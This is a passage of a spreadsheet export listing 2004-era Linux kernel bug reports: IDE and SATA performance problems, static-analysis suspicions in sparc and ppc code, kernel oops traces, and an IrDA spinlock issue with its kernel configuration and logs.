[&lt;c01039ed&gt;] sysenter_past_esp+0x52/0x71 May 8 12:18:53 rousalka kernel:</t>
  </si>
  <si>
    <t>Re: hdc: lost interrupt ide-cd: cmd 0x3 timed out ...</t>
  </si>
  <si>
    <t>2.6.6-rc3-bk8</t>
  </si>
  <si>
    <t>2004-05-09 23:52 UTC</t>
  </si>
  <si>
    <t>2004-06-29 15:25 UTC</t>
  </si>
  <si>
    <t>2689 2888</t>
  </si>
  <si>
    <t>Hardware Environment: SiS961 Problem Description: modprobing ide-cd hangs on SiS961.</t>
  </si>
  <si>
    <t>extremely poor performance with SATA drive on 2.6 kernel.</t>
  </si>
  <si>
    <t>2004-05-10 13:07 UTC</t>
  </si>
  <si>
    <t>Gene Czarcinski</t>
  </si>
  <si>
    <t>2004-12-06 13:25 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 1 with their kernel-2.4.22-1.2188 Fedora Core 2 with their kernel-2.6.5-1.356 Hardware Environment: ASUS SK8V motherboard with Opteron 140 on an onboard VIA adapter supporting a single SATA drive. There are two Maxtor 120GB drives on this system a PATA drive on /dev/hda and a SATA drive which is on /dev/hde on the 2.6 kernel and /dev/sda on the 2.4.22 kernel. The results of lspci are: 00:00.0 Host bridge: VIA Technologies, Inc. VT8385 [K8T800 AGP] Host Bridge (rev 01) 00:01.0 PCI bridge: VIA Technologies, Inc. VT8237 PCI bridge [K8T800 South] 00:0a.0 Ethernet controller: 3Com Corporation 3c940 10/100/1000Base-T [Marvell] (rev 12) 00:0c.0 Multimedia audio controller: Ensoniq 5880 AudioPCI (rev 02) 00:0f.0 RAID bus controller: VIA Technologies, Inc. VIA VT6420 SATA RAID Controller (rev 80) 00:0f.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) 00:10.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) 00:10.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) 00:10.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) 00:10.3 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) 00:10.4 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 86) 00:11.0 ISA bridge: VIA Technologies, Inc. VT8237 ISA bridge [K8T800 South] 00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 NorthBridge 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 NorthBridge 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 NorthBridge 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 NorthBridge 01:00.0 VGA compatible controller: ATI Technologies Inc Radeon R200 QM [Radeon 9100] (rev 80) Software Environment: Problem Description: When I run hdparm -Tt on the FC1 system with the 2.4 kernel, I get: /dev/hda: Timing buffer-cache reads: 2508 MB in 2.00 seconds = 1254.00 MB/sec Timing buffered disk reads: 170 MB in 3.03 seconds = 56.11 MB/sec /dev/sda: Timing buffer-cache reads: 2400 MB in 2.00 seconds = 1200.00 MB/sec Timing buffered disk reads: 168 MB in 3.01 seconds = 55.81 MB/sec or that the two disks operate pretty much the same. However, when I run hdparm -Tt on the FC2 system with the 2.6 kernel I get: [root@hummer root]# hdparm -Tt /dev/hda /dev/hda: Timing buffer-cache reads: 2364 MB in 2.00 seconds = 1181.59 MB/sec Timing buffered disk reads: 168 MB in 3.00 seconds = 55.93 MB/sec [root@hummer root]# hdparm -Tt /dev/hde /dev/hde: Timing buffer-cache reads: 2444 MB in 2.00 seconds = 1220.35 MB/sec Timing buffered disk reads: 12 MB in 3.40 seconds = 3.53 MB/sec</t>
  </si>
  <si>
    <t>2.6.6</t>
  </si>
  <si>
    <t>yann RIVIERE</t>
  </si>
  <si>
    <t>[OPERA] potential error detected by an analysis tool</t>
  </si>
  <si>
    <t>2004-05-11 12:44 UTC</t>
  </si>
  <si>
    <t>Zhenmin</t>
  </si>
  <si>
    <t>2005-12-29 04:43 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Software Environment: Problem Description: The potential error is detected by a static analysis tool in /arch/sparc/prom/memory.c:158-159 153 for(iter=0; iter&lt;num_regs; iter++) { 154 prom_prom_taken[iter].start_adr = 155 (char *) prom_reg_memlist[iter].phys_addr; 156 prom_prom_taken[iter].num_bytes = 157 (unsigned long) prom_reg_memlist[iter].reg_size; 158 prom_prom_taken[iter].theres_more = 159 &amp;prom_phys_total[iter+1]; 160 } L158-159 may be changed to: 158 prom_prom_taken[iter].theres_more = 159 &amp;prom_prom_taken[iter+1]; Can anyone confirm whether it is really a bug or not? Steps to reproduce: The potential error is detected by a static analysis tool.</t>
  </si>
  <si>
    <t>2004-05-11 13:10 UTC</t>
  </si>
  <si>
    <t>2005-08-28 17:43 UTC</t>
  </si>
  <si>
    <t>Problem Description: The potential error is detected by a static analysis tool in /arch/sparc64/prom/memory.c:116-117 111 for(iter=0; iter&lt;num_regs; iter++) { 112 prom_prom_taken[iter].start_adr = 113 prom_reg_memlist[iter].phys_addr; 114 prom_prom_taken[iter].num_bytes = 115 prom_reg_memlist[iter].reg_size; 116 prom_prom_taken[iter].theres_more = 117 &amp;prom_phys_total[iter+1]; 118 } L116-117 may be changed to: 116 prom_prom_taken[iter].theres_more = 117 &amp;prom_prom_taken[iter+1]; Can anyone confirm whether it really is a bug or not?</t>
  </si>
  <si>
    <t>2004-05-11 13:20 UTC</t>
  </si>
  <si>
    <t>2006-04-02 09:08 UTC</t>
  </si>
  <si>
    <t>Problem Description: The potential error is detected by a static analysis tool in /arch/sparc/kernel/sun4m_smp.c:227-228 225 if(cpu_callin_map[i]) { 226 /* Another "Red Snapper". */ 227 __cpu_number_map[i] = i; 228 __cpu_logical_map[i] = i; 229 } else { Lines 227-228 may be changed to: 227 __cpu_number_map[i] = cpucount; 228 __cpu_logical_map[cpucount] = i; Can anyone confirm whether it is a bug or not?</t>
  </si>
  <si>
    <t>2004-05-11 13:27 UTC</t>
  </si>
  <si>
    <t>2005-12-29 04:44 UTC</t>
  </si>
  <si>
    <t>Problem Description: The potential error is detected by a static analysis tool in /arch/sparc64/kernel/sunos_ioctl32.c:163-168 163 case _IOW('i', 21, struct ifreq): /* SIOCSIFMTU */ 164 ret = sys_ioctl(fd, SIOCSIFMTU, arg); 165 goto out; 166 case _IOWR('i', 22, struct ifreq): /* SIOCGIFMTU */ 167 ret = sys_ioctl(fd, SIOCGIFMTU, arg); 168 goto out; May be changed to: 163 case _IOW('i', 21, struct ifreq32): /* SIOCSIFMTU */ 164 ret = compat_sys_ioctl(fd, SIOCSIFMTU, arg); 165 goto out; 166 case _IOWR('i', 22, struct ifreq32): /* SIOCGIFMTU */ 167 ret = compat_sys_ioctl(fd, SIOCGIFMTU, arg); 168 goto out; Can anyone confirm whether it is a bug or not?</t>
  </si>
  <si>
    <t>ralf</t>
  </si>
  <si>
    <t>2004-05-11 13:41 UTC</t>
  </si>
  <si>
    <t>2004-12-01 00:11 UTC</t>
  </si>
  <si>
    <t>Problem Description: The potential error is detected by a static analysis tool in /arch/ppc/platforms/pmac_feature.c:1160 1154 } else if (number == 4) { 1155 MACIO_BIC(KEYLARGO_FCR1, (KL1_USB2_PAD_SUSPEND0 | KL1_USB2_PAD_SUSPEND1)); 1156 UNLOCK(flags); 1157 (void)MACIO_IN32(KEYLARGO_FCR1); 1158 mdelay(1); 1159 LOCK(flags); 1160 MACIO_BIS(KEYLARGO_FCR0, KL1_USB2_CELL_ENABLE); 1161 } 1160 may be changed to: MACIO_BIS(KEYLARGO_FCR1, KL1_USB2_CELL_ENABLE); Can anyone confirm whether it really is a bug or not?</t>
  </si>
  <si>
    <t>Kernel Crash; Could be related to quotas on ext3</t>
  </si>
  <si>
    <t>2004-05-13 04:25 UTC</t>
  </si>
  <si>
    <t>Mark Williamson</t>
  </si>
  <si>
    <t>2005-09-02 15:28 UTC</t>
  </si>
  <si>
    <t>Distribution: RHL 9, but with Vanilla 2.6.6 Kernel Hardware Environment: ic7 max 3 MOBO with SATA drives Software Environment: Problem Description: Kernel Crash; May 13 11:55:28 server kernel: VFS: Quota for id 0 referenced but not present. May 13 11:55:28 server kernel: VFS: Can't read quota structure for id 0. May 13 11:55:28 server kernel: Unable to handle kernel NULL pointer dereference at virtual address 00000074 May 13 11:55:28 server kernel: printing eip: May 13 11:55:28 server kernel: c017cba3 May 13 11:55:28 server kernel: *pde = 00000000 May 13 11:55:28 server kernel: Oops: 0000 [#1] May 13 11:55:28 server kernel: SMP May 13 11:55:28 server kernel: CPU: 1 May 13 11:55:28 server kernel: EIP: 0060:[&lt;c017cba3&gt;] Not tainted May 13 11:55:28 server kernel: EFLAGS: 00010282 (2.6.6) May 13 11:55:28 server kernel: EIP is at dquot_transfer+0x14e/0x415 May 13 11:55:28 server kernel: eax: 00000000 ebx: 00000004 ecx: f69ea210 edx: 00000000 May 13 11:55:28 server kernel: esi: 00000000 edi: 00000006 ebp: 00000000 esp: e3763e84 May 13 11:55:28 server kernel: ds: 007b es: 007b ss: 0068 May 13 11:55:28 server kernel: Process mv (pid: 15167, threadinfo=e3762000 task=eed70130) May 13 11:55:28 server kernel: Stack: f69ea210 2be60000 00000000 00000000 e3763eaf 00000000 00000000 00000001 May 13 11:55:28 server kernel: 2be60000 00000000 0000381c 00000000 00000000 f69eae10 f69ea210 f131324c May 13 11:55:28 server kernel: c06a381c f131324c c06a381c c0191642 c06a381c e3763f28 de319540 00000046 May 13 11:55:28 server kernel: Call Trace: May 13 11:55:28 server kernel: [&lt;c0191642&gt;] ext3_setattr+0xbe/0x280 May 13 11:55:28 server kernel: [&lt;c016b510&gt;] notify_change+0x1cc/0x200 May 13 11:55:28 server kernel: [&lt;c0150804&gt;] chown_common+0xae/0xe0 May 13 11:55:28 server kernel: [&lt;c015f668&gt;] __user_walk+0x5c/0x5e May 13 11:55:28 server kernel: [&lt;c0150885&gt;] sys_chown+0x4f/0x5b May 13 11:55:28 server kernel: [&lt;c0105fe7&gt;] syscall_call+0x7/0xb May 13 11:55:28 server kernel: May 13 11:55:28 server kernel: Code: 8b 42 74 83 f8 01 0f 86 e1 01 00 00 83 e8 01 89 42 74 8b 42 Steps to reproduce: Unknown :(</t>
  </si>
  <si>
    <t>2004-05-13 05:35 UTC</t>
  </si>
  <si>
    <t>2006-01-03 09:27 UTC</t>
  </si>
  <si>
    <t>Don Fry</t>
  </si>
  <si>
    <t>This bug was reported at http://bugs.debian.org/241656 The card is an Allied Telesyn 2700FX/SC which has a fibre port. The symptom is that the card works normally until the cable is unplugged and plugged back in. At that point the driver fails to detect carrier. Disabling auto-select by loading the module with options=14 fixes the problem.</t>
  </si>
  <si>
    <t>Hard system lockups A7N8X Mainboard and Promise Ultra100TX2</t>
  </si>
  <si>
    <t>2004-05-13 15:17 UTC</t>
  </si>
  <si>
    <t>Wayne Mckinney</t>
  </si>
  <si>
    <t>2004-06-04 12:19 UTC</t>
  </si>
  <si>
    <t>Distribution: Hard system lockup Hardware Environment: A7N8X Mainboard and Promise Ultra100TX2 01:06.0 Unknown mass storage controller: Promise Technology, Inc. 20268 (rev 02) (prog-if 85) Subsystem: Promise Technology, Inc. Ultra100TX2 Flags: bus master, 66Mhz, slow devsel, latency 32, IRQ 11 I/O ports at a000 [size=8] I/O ports at a400 [size=4] I/O ports at a800 [size=8] I/O ports at ac00 [size=4] I/O ports at b000 [size=16] Memory at e0000000 (32-bit, non-prefetchable) [size=16K] Expansion ROM at &lt;unassigned&gt; [disabled] [size=16K] Capabilities: [60] Power Management version 1 Software Environment: gentoo 1.4 gcc-3.3.2-r5 Problem Description: system locks up on disk access Steps to reproduce: ls of large dir or mysql lookup</t>
  </si>
  <si>
    <t>(IRDA) spin_lock already locked in sir_dev.c</t>
  </si>
  <si>
    <t>2004-05-14 04:12 UTC</t>
  </si>
  <si>
    <t>2006-04-15 02:27 UTC</t>
  </si>
  <si>
    <t>Distribution: debian unstable Hardware Environment: i686, tekram irda on pl2303 usb serial port Software Environment: irda-utils/unstable uptodate 0.9.16-3 libmultisync-plugin-opie/unstable uptodate 0.82-1 libmultisync-plugin-irmc/unstable uptodate 0.82-1 libmultisync-plugin-backup/unstable uptodate 0.82-1 multisync/unstable uptodate 0.82-1 CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y CONFIG_EXPERIMENTAL=y CONFIG_CLEAN_COMPILE=y CONFIG_BROKEN_ON_SMP=y CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_SYSCTL=y CONFIG_LOG_BUF_SHIFT=14 CONFIG_IKCONFIG=y CONFIG_IKCONFIG_PROC=y CONFIG_KALLSYMS=y CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y CONFIG_IOSCHED_CFQ=y CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_MODULE_FORCE_UNLOAD=y CONFIG_OBSOLETE_MODPARM=y CONFIG_KMOD=y CONFIG_X86_PC=y CONFIG_MPENTIUMIII=y CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=5 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_TSC=y CONFIG_X86_MCE=y CONFIG_NOHIGHMEM=y CONFIG_MTRR=y CONFIG_REGPARM=y CONFIG_PM=y CONFIG_PM_DISK=y CONFIG_PM_DISK_PARTITION="/dev/hda1" CONFIG_ACPI_BOOT=y CONFIG_PCI=y CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y CONFIG_PCI_MMCONFIG=y CONFIG_PCI_NAMES=y CONFIG_BINFMT_ELF=y CONFIG_BLK_DEV_FD=m CONFIG_BLK_DEV_LOOP=m CONFIG_BLK_DEV_NBD=m CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y CONFIG_BLK_DEV_IDECD=y CONFIG_IDE_GENERIC=y CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_SHARE_IRQ=y CONFIG_BLK_DEV_GENERIC=y CONFIG_BLK_DEV_IDEDMA_PCI=y CONFIG_IDEDMA_PCI_AUTO=y CONFIG_BLK_DEV_ADMA=y CONFIG_BLK_DEV_PIIX=y CONFIG_BLK_DEV_IDEDMA=y CONFIG_IDEDMA_AUTO=y CONFIG_SCSI=m CONFIG_SCSI_PROC_FS=y CONFIG_BLK_DEV_SD=m CONFIG_SCSI_REPORT_LUNS=y CONFIG_SCSI_SPI_ATTRS=m CONFIG_SCSI_AIC7XXX=m CONFIG_AIC7XXX_CMDS_PER_DEVICE=32 CONFIG_AIC7XXX_RESET_DELAY_MS=15000 CONFIG_AIC7XXX_DEBUG_MASK=0 CONFIG_SCSI_QLA2XXX=m CONFIG_I2O=m CONFIG_I2O_PCI=m CONFIG_I2O_PROC=m CONFIG_NET=y CONFIG_PACKET=y CONFIG_UNIX=y CONFIG_INET=y CONFIG_IP_MULTICAST=y CONFIG_IP_PNP=y CONFIG_IP_PNP_DHCP=y CONFIG_IRDA=m CONFIG_IRLAN=m CONFIG_IRCOMM=m CONFIG_IRDA_ULTRA=y CONFIG_IRDA_CACHE_LAST_LSAP=y CONFIG_IRDA_FAST_RR=y CONFIG_IRDA_DEBUG=y CONFIG_IRTTY_SIR=m CONFIG_DONGLE=y CONFIG_ESI_DONGLE=m CONFIG_ACTISYS_DONGLE=m CONFIG_TEKRAM_DONGLE=m CONFIG_LITELINK_DONGLE=m CONFIG_MA600_DONGLE=m CONFIG_GIRBIL_DONGLE=m CONFIG_MCP2120_DONGLE=m CONFIG_OLD_BELKIN_DONGLE=m CONFIG_ACT200L_DONGLE=m CONFIG_NETDEVICES=y CONFIG_NET_ETHERNET=y CONFIG_NET_VENDOR_3COM=y CONFIG_VORTEX=y CONFIG_INPUT=y CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 CONFIG_SOUND_GAMEPORT=y CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y CONFIG_SERIAL_8250=y CONFIG_SERIAL_8250_NR_UARTS=4 CONFIG_SERIAL_CORE=y CONFIG_UNIX98_PTYS=y CONFIG_HW_RANDOM=m CONFIG_RTC=m CONFIG_GEN_RTC=m CONFIG_GEN_RTC_X=y CONFIG_AGP=y CONFIG_AGP_INTEL=y CONFIG_DRM=y CONFIG_DRM_MGA=y CONFIG_I2C=m CONFIG_I2C_CHARDEV=m CONFIG_I2C_ALGOBIT=m CONFIG_I2C_I801=m CONFIG_I2C_ISA=m CONFIG_I2C_SENSOR=m CONFIG_SENSORS_ADM1021=m CONFIG_SENSORS_DS1621=m CONFIG_SENSORS_FSCHER=m CONFIG_SENSORS_IT87=m CONFIG_SENSORS_LM75=m CONFIG_SENSORS_LM78=m CONFIG_SENSORS_LM80=m CONFIG_SENSORS_LM83=m CONFIG_SENSORS_LM85=m CONFIG_SENSORS_LM90=m CONFIG_SENSORS_VIA686A=m CONFIG_SENSORS_W83781D=m CONFIG_SENSORS_W83L785TS=m CONFIG_SENSORS_W83627HF=m CONFIG_SENSORS_EEPROM=m CONFIG_VIDEO_DEV=m CONFIG_VIDEO_BT848=m CONFIG_VIDEO_TUNER=m CONFIG_VIDEO_BUF=m CONFIG_VIDEO_BTCX=m CONFIG_VIDEO_IR=m CONFIG_VGA_CONSOLE=y CONFIG_DUMMY_CONSOLE=y CONFIG_SOUND=y CONFIG_SND=m CONFIG_SND_TIMER=m CONFIG_SND_PCM=m CONFIG_SND_HWDEP=m CONFIG_SND_RAWMIDI=m CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=m CONFIG_SND_PCM_OSS=m CONFIG_SND_RTCTIMER=m CONFIG_SND_AC97_CODEC=m CONFIG_SND_BT87X=m CONFIG_SND_EMU10K1=m CONFIG_USB=m CONFIG_USB_DEVICEFS=y CONFIG_USB_UHCI_HCD=m CONFIG_USB_STORAGE=m CONFIG_USB_SERIAL=m CONFIG_USB_SERIAL_GENERIC=y CONFIG_USB_SERIAL_PL2303=m CONFIG_USB_LED=m CONFIG_REISERFS_FS=y CONFIG_ISO9660_FS=m CONFIG_JOLIET=y CONFIG_UDF_FS=m CONFIG_FAT_FS=m CONFIG_MSDOS_FS=m CONFIG_VFAT_FS=m CONFIG_PROC_FS=y CONFIG_PROC_KCORE=y CONFIG_SYSFS=y CONFIG_RAMFS=y CONFIG_NFS_FS=y CONFIG_NFS_V3=y CONFIG_ROOT_NFS=y CONFIG_LOCKD=y CONFIG_LOCKD_V4=y CONFIG_SUNRPC=y CONFIG_SMB_FS=m CONFIG_MSDOS_PARTITION=y CONFIG_NLS=y CONFIG_NLS_DEFAULT="iso8859-1" CONFIG_NLS_CODEPAGE_437=y CONFIG_NLS_ISO8859_1=y CONFIG_DEBUG_KERNEL=y CONFIG_EARLY_PRINTK=y CONFIG_DEBUG_STACKOVERFLOW=y CONFIG_DEBUG_SLAB=y CONFIG_MAGIC_SYSRQ=y CONFIG_DEBUG_SPINLOCK=y CONFIG_DEBUG_PAGEALLOC=y CONFIG_DEBUG_INFO=y CONFIG_DEBUG_SPINLOCK_SLEEP=y CONFIG_FRAME_POINTER=y CONFIG_4KSTACKS=y CONFIG_X86_BIOS_REBOOT=y CONFIG_X86_STD_RESOURCES=y CONFIG_PC=y Problem Description: unbranded (but apparently tekram) irda device does not work, can see phone in irdadump output, but when you search for devices in multisync you get nasty errors in the kernel log: May 14 22:42:07 tv kernel: usbcore: registered new driver usbfs May 14 22:42:07 tv kernel: usbcore: registered new driver hub May 14 22:42:07 tv kernel: USB Universal Host Controller Interface driver v2.2 May 14 22:42:07 tv kernel: PCI: Found IRQ 11 for device 0000:00:1f.2 May 14 22:42:07 tv kernel: uhci_hcd 0000:00:1f.2: Intel Corp. 82801AA USB May 14 22:42:07 tv kernel: uhci_hcd 0000:00:1f.2: irq 11, io base 0000ff80 May 14 22:42:07 tv kernel: uhci_hcd 0000:00:1f.2: new USB bus registered, assigned bus number 1 May 14 22:42:07 tv kernel: hub 1-0:1.0: USB hub found May 14 22:42:07 tv kernel: hub 1-0:1.0: 2 ports detected May 14 22:42:08 tv kernel: usb 1-1: new full speed USB device using address 2 May 14 22:42:17 tv kernel: drivers/usb/serial/usb-serial.c: USB Serial support registered for Generic May 14 22:42:17 tv kernel: usbcore: registered new driver usbserial May 14 22:42:17 tv kernel: drivers/usb/serial/usb-serial.c: USB Serial Driver core v2.0 May 14 22:42:17 tv kernel: drivers/usb/serial/usb-serial.c: USB Serial support registered for PL-2303 May 14 22:42:17 tv kernel: pl2303 1-1:1.0: PL-2303 converter detected May 14 22:42:17 tv kernel: usb 1-1: PL-2303 converter now attached to ttyUSB0 (or usb/tts/0 for devfs) May 14 22:42:17 tv kernel: usbcore: registered new driver pl2303 May 14 22:42:17 tv kernel: drivers/usb/serial/pl2303.c: Prolific PL2303 USB to serial adaptor driver v0.10 May 14 22:42:58 tv kernel: NET: Registered protocol family 23 May 14 22:43:00 tv irattach: executing: 'echo tv &gt; /proc/sys/net/irda/devname' May 14 22:43:00 tv irattach: executing: 'echo 1 &gt; /proc/sys/net/irda/discovery' May 14 22:43:00 tv irattach: Starting device irda0 May 14 22:45:33 tv kernel: drivers/net/irda/sir_dev.c:341: spin_is_locked(drivers/net/irda/sir_dev.c:c786cbb0) already locked by drivers/net/irda/sir_dev.c/142 May 14 22:45:33 tv kernel: drivers/net/irda/sir_dev.c:346: spin_lock(drivers/net/irda/sir_dev.c:c786cbb0) already locked by drivers/net/irda/sir_dev.c/142 May 14 22:45:36 tv kernel: IrLAP, no activity on link! May 14 22:45:45 tv last message repeated 3 times May 14 22:45:46 tv kernel: drivers/net/irda/sir_dev.c:341: spin_is_locked(drivers/net/irda/sir_dev.c:c786cbb0) already locked by drivers/net/irda/sir_dev.c/142 May 14 22:45:46 tv kernel: drivers/net/irda/sir_dev.c:346: spin_lock(drivers/net/irda/sir_dev.c:c786cbb0) already locked by drivers/net/irda/sir_dev.c/142 May 14 22:48:40 tv shutdown[671]: shutting down for system reboot Steps to reproduce: This problem seems quite repeatable, I can provide further information or testing as required. modprobe uhci-hcd modprobe pl2303 irattach /dev/ttyUSB0 -d tekram -s start multisync, select irmc device and search for devices, device found but serial number is "serial number" and the above messages appear in the kernel log. I also have the following that was generated by a different 2.6.6 build on the same hardware. Sorry I don't have the kernel config for this kernel, however I do know that preemptitive kernel was turned on and all the kernel debug was turned off. May 14 18:57:58 tv irattach: executing: 'echo tv &gt; /proc/sys/net/irda/devname' May 14 18:57:58 tv irattach: executing: 'echo 1 &gt; /proc/sys/net/irda/discovery' May 14 18:57:58 tv irattach: Starting device irda0 May 14 18:58:55 tv kernel: Call Trace: May 14 18:58:55 tv kernel: [&lt;c024db35&gt;] schedule+0x5a5/0x5b0 May 14 18:58:55 tv kernel: [&lt;cab45655&gt;] sirdev_receive+0x85/0x130 [sir_dev] May 14 18:58:55 tv kernel: [&lt;c0120a45&gt;] worker_thread+0x255/0x270 May 14 18:58:55 tv kernel: [&lt;cab390b0&gt;] usb_serial_port_softint+0x0/0xe0 [usbserial] May 14 18:58:55 tv kernel: [&lt;c0110490&gt;] default_wake_function+0x0/0x10 May 14 18:58:55 tv kernel: [&lt;c0110490&gt;] default_wake_function+0x0/0x10 May 14 18:58:55 tv kernel: [&lt;c01207f0&gt;] worker_thread+0x0/0x270 May 14 18:58:55 tv kernel: [&lt;c0123c08&gt;] kthread+0x98/0xa0 May 14 18:58:55 tv kernel: [&lt;c0123b70&gt;] kthread+0x0/0xa0 May 14 18:58:55 tv kernel: [&lt;c010203d&gt;] kernel_thread_helper+0x5/0x18 May 14 18:58:55 tv kernel: May 14 18:58:55 tv kernel: Call Trace: May 14 18:58:55 tv kernel: [&lt;c024db35&gt;] schedule+0x5a5/0x5b0 May 14 18:58:55 tv kernel: [&lt;c0120a45&gt;] worker_thread+0x255/0x270 May 14 18:58:55 tv kernel: [&lt;cab390b0&gt;] usb_serial_port_softint+0x0/0xe0 [usbserial] May 14 18:58:55 tv kernel: [&lt;c0110490&gt;] default_wake_function+0x0/0x10 May 14 18:58:55 tv kernel: [&lt;c0110490&gt;] default_wake_function+0x0/0x10 May 14 18:58:55 tv kernel: [&lt;c01207f0&gt;] worker_thread+0x0/0x270 May 14 18:58:55 tv kernel: [&lt;c0123c08&gt;] kthread+0x98/0xa0 May 14 18:58:55 tv kernel: [&lt;c0123b70&gt;] kthread+0x0/0xa0 May 14 18:58:55 tv kernel: [&lt;c010203d&gt;] kernel_thread_helper+0x5/0x18 May 14 18:58:55 tv kernel: May 14 18:58:55 tv kernel: Call Trace: May 14 18:58:55 tv kernel: [&lt;c024db35&gt;] schedule+0x5a5/0x5b0 May 14 18:58:55 tv kernel: [&lt;c0120a45&gt;] worker_thread+0x255/0x270 May 14 18:58:55 tv kernel: [&lt;cab390b0&gt;] usb_serial_port_softint+0x0/0xe0 [usbserial] May 14 18:58:55 tv kernel: [&lt;c0110490&gt;] default_wake_function+0x0/0x10 May 14 18:58:55 tv kernel: [&lt;c0110490&gt;] default_wake_function+0x0/0x10 May 14 18:58:55 tv kernel: [&lt;c01207f0&gt;] worker_thread+0x0/0x270 May 14 18:58:55 tv kernel: [&lt;c0123c08&gt;] kthread+0x98/0xa0 May 14 18:58:55 tv kernel: [&lt;c0123b70&gt;] kthread+0x0/0xa0 May 14 18:58:55 tv kernel: [&lt;c010203d&gt;] kernel_thread_helper+0x5/0x18 May 14 18:58:55 tv kernel: May 14 18:58:56 tv kernel: Call Trace: May 14 18:58:56 tv kernel: [&lt;c024db35&gt;] schedule+0x5a5/0x5b0 May 14 18:58:56 tv kernel: [&lt;c0120a45&gt;] worker_thread+0x255/0x270 May 14 18:58:56 tv kernel: [&lt;cab390b0&gt;] usb_serial_port_softint+0x0/0xe0 [usbserial] May 14 18:58:56 tv kernel: [&lt;c0110490&gt;] default_wake_function+0x0/0x10 May 14 18:58:56 tv kernel: [&lt;c0110490&gt;] default_wake_function+0x0/0x10 May 14 18:58:56 tv kernel: [&lt;c01207f0&gt;] worker_thread+0x0/0x270 May 14 18:58:56 tv kernel: [&lt;c0123c08&gt;] kthread+0x98/0xa0 May 14 18:58:56 tv kernel: [&lt;c0123b70&gt;] kthread+0x0/0xa0 May 14 18:58:56 tv kernel: [&lt;c010203d&gt;] kernel_thread_helper+0x5/0x18 May 14 18:58:56 tv kernel: May 14 18:58:56 tv kernel: Call Trace: May 14 18:58:56 tv kernel: [&lt;c024db35&gt;] schedule+0x5a5/0x5b0 May 14 18:58:56 tv kernel: [&lt;c0120a45&gt;] worker_thread+0x255/0x270 May 14 18:58:56 tv kernel: [&lt;cab390b0&gt;] usb_serial_port_softint+0x0/0xe0 [usbserial] May 14 18:58:56 tv kernel: [&lt;c0110490&gt;] default_wake_function+0x0/0x10 May 14 18:58:56 tv kernel: [&lt;c0110490&gt;] default_wake_function+0x0/0x10 May 14 18:58:56 tv kernel: [&lt;c01207f0&gt;] worker_thread+0x0/0x270 May 14 18:58:56 tv kernel: [&lt;c0123c08&gt;] kthread+0x98/0xa0 May 14 18:58:56 tv kernel: [&lt;c0123b70&gt;] kthread+0x0/0xa0 May 14 18:58:56 tv kernel: [&lt;c010203d&gt;] kernel_thread_helper+0x5/0x18 May 14 18:58:56 tv kernel: and many more</t>
  </si>
  <si>
    <t>Yaz</t>
  </si>
  <si>
    <t>Enabling EST feature using _PDC, when BIOS doesn't do it by default</t>
  </si>
  <si>
    <t>2004-05-14 12:16 UTC</t>
  </si>
  <si>
    <t>2004-11-04 13:10 UTC</t>
  </si>
  <si>
    <t>Distribution: 2.6 base kernel Hardware Environment: Software Environment: Problem Description: BIOS may not expose EST feature by default, even when platform supports it. OS needs to communicate its capability to handle EST, to BIOS, using _PDC method. This has to be done before OS looks at other P-state related methods (like _PSS, _PCT, etc). The attached patches adds this functionality to the ACPI processor driver. Steps to reproduce:</t>
  </si>
  <si>
    <t>Synaptics touch pad not recognized under 2.6.X Kernels on Sharp MM20</t>
  </si>
  <si>
    <t>2.6.0 - 2.6.6</t>
  </si>
  <si>
    <t>2004-05-14 17:11 UTC</t>
  </si>
  <si>
    <t>David Cafaro</t>
  </si>
  <si>
    <t>2006-01-30 08:54 UTC</t>
  </si>
  <si>
